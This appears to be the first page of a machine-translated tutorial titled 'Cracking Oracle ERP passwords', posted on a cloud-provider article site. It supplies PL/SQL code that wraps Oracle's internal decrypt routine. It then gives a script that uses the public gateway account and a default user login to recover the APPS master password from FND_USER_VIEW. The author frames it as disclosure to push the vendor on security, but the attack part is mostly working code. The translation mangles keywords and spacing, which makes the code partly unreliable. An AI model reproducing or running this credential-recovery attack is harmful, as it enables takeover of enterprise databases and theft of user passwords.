Home > Developer > Database Administrator

Cracking Oracle ERP passwords

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

1.Writing Purpose1

2.Create a Package in Oracle ERPDatabase using Toad or other pl/SQL tools. The source code is as follows:...1

(1) create a Package Header1

(2) create a Package Body.1

3.Procedure2

4.Use any User name/password to obtain the APPS password2

5.How to obtain the plaintext password through FND_USER: ENCRYPTED_USER_PASSWORD...3

6.The preceding Package is used to obtain the password of all Oracle ERPApplication users....3

7.The preceding Package is used to obtain the password of all Oracle ERPDatabase users....3

8.Delete the Package created in step 1 3

9.Conclusion3

10.Improve the security of Oracle ERP4

11.This program passed the Toad test in Oracle ERP 11.5.9.4 

1. Writing Purpose

I have been thinking about this issue for a long time, but I think that the method of password cracking will still be known sooner or later, instead of letting a few people know about it, it is better to let everyone know that we should take precautions in advance.

The purpose of publishing the password cracking method is to make Oracle ERP more secure, so that we can use it with confidence. After all, it is tens of millions of things, the current security obviously does not meet the user's requirements. I want to use everyone's strength to put a little pressure on Oracle to make it safer for all Oracle ERP versions.

2. Create a Package in OracleERP Database using Toad or other pl/SQL tools. The source code is as follows:

(1) create a Package Header

  1. CREATE OR REPLACEPACKAGE CrackPwd AUTHIDCURRENT_USER
  3. AS
  5. FUNCTIONGetpwd (orauserINVARCHAR2, appuserpwdINVARCHAR2)
  7. RETURNVARCHAR2;
  9. ENDCrackPwd;

(2) create a Package Bdy

  1. CREATE OR REPLACEPackage body CrackPwd
  3. AS
  5. FUNCTIONGetpwd (orauserINVARCHAR2, appuserpwdINVARCHAR2)
  7. RETURNVARCHAR2
  9. AS
  11. LANGUAGE JAVA
  13. NAME 'Oracle. apps. fnd. security. WebSessionManagerProc. decrypt (java. lang. String, java. lang. String) return java. lang. string';
  15. ENDCrackPwd;
  17. /

3. Steps for obtaining the APPS Password

 Suppose whatOracle erpNo Permissions,How to knowOracle erp databaesWhat about permissions??We knowOracle erpProvidesDatabasePublic Account(Gateway user ),Owned by this accountDatabaseMinimum permission,This public account is: APPLSYSPUB/PUB (oracle erpWebpage orURLMake public this account),Although this account has no Permissions,HoweverFND_USER_VIEWQuery permission,Through thisViewWe can see thatErpAllUserAndENCRYPED_FOUNDATION_PASSWORD field. The problem lies in the ENCRYPED_FOUNDATION_PASSWORD field of this view. The ENCRYPED_FOUNDATION_PASSWORD field is obtained by the APPS password and user password through the encryption algorithm, therefore, as long as you know the Oracle ERP decryption algorithm, you can use any user password in fnd_user to reverse query the apps password ., it is too easy to know the password of any user in fnd_user. Many accounts are preset during erp installation. The user names and passwords of these accounts are the same, generally, no one has changed the passwords of these accounts.

4. Use any Username/password to obtain the APPS password

  1. SETSERVEROUTPUTON
  3. DECLARE
  5. GuestUserPwd VARCHAR2 (200 );
  7. GuestUserName VARCHAR2 (100 );
  9. GuestFndPwd VARCHAR2 (100 );
  11. GuestEncFndPwd VARCHAR2 (100 );
  13. Delim NUMBER;
  15. BEGIN
  17. GuestUserPwd: ='Guest/ORACLE';-- Can any user password
  19. IF guestUserPwdIS NULL THEN
  21. GuestUserPwd: =UPPER(Fnd_profile.value ('Guest _ user_pwd'));
  23. ENDIF;
  25. Delim: = INSTR (guestUserPwd,'/');
  27. GuestUserName: =UPPER(SUBSTR (guestUserPwd, 1, delim-1 ));
  29. SELECTEncrypted_foundation_passwordINTOGuestEncFndPwd
  31. FROMFnd_user_view
  33. WHEREUser_name = guestUserNameAND(Start_date <= SYSDATE)AND
  35. (End_dateIS NULL OREnd_date> SYSDATE );
  37. GuestFndPwd: = CrackPwd. getpwd (guestUserPwd, guestEncFndPwd );
  39. IFNOT(GuestFndPwdIS NULL)THEN
  41. DBMS_OUTPUT.put_line (guestFndPwd );
  43. ENDIF;
  45. END;

Note: GuestUserPwd: ='Guest/ORACLE';-- Can any userpassword

The above line can be changed to the username/password of any User, and the account and password are separated "/"

The above program can be executed using toad

  • 1
  • 2
  • Next Page

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
oracle erp software oracle erp implementation steps oracle fusion erp modules oracle erp clients list oracle erp competitors oracle erp books oracle erp vs sap erp market share
Related Article
Database Administrator DBA
Alibaba DBA (database administrator) pen question __ Database
Level of DBA (database administrator)
The personality characteristics of the DBA (database administ...
Recover database administrator password, user authorization, ...
Sort common DB2 scripts

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More